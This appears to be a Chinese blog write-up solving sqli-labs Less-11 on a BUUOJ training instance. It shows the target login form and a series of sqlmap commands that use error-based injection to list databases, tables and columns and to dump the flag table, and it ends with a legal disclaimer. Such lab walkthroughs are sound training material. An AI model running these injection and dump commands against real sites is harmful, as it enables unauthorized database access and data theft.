sqli-labs
1
点击启动靶机。
SQLi-LABS Page-1(Basic Challenges)
解法
随便提交一些数据。
审查元素。
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :
<input type="text" name="uname" value=""/>
</div>
<div> Password :
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>
根据表单构造 POST 请求体:
passwd=123456&submit=Submit&uname=admin
用 sqlmap 扫描:
sqlmap -u http://9a524acb-2e0c-4b8f-ad64-a9be20ee4453.node5.buuoj.cn/Less-11/ --data="passwd=123456&submit=Submit&uname=admin" --batch
爆库名:
sqlmap -u http://9a524acb-2e0c-4b8f-ad64-a9be20ee4453.node5.buuoj.cn/Less-11/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E --dbs
爆表名:
sqlmap -u http://9a524acb-2e0c-4b8f-ad64-a9be20ee4453.node5.buuoj.cn/Less-11/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining --tables
爆列名:
sqlmap -u http://9a524acb-2e0c-4b8f-ad64-a9be20ee4453.node5.buuoj.cn/Less-11/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining -T flag --columns
查询 flag。
sqlmap -u http://9a524acb-2e0c-4b8f-ad64-a9be20ee4453.node5.buuoj.cn/Less-11/ --data="passwd=123456&submit=Submit&uname=admin" --batch --technique E -D ctftraining -T flag -C flag --dump
Flag
flag{6baf6140-4646-4f31-bb61-e42b13de98a1}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。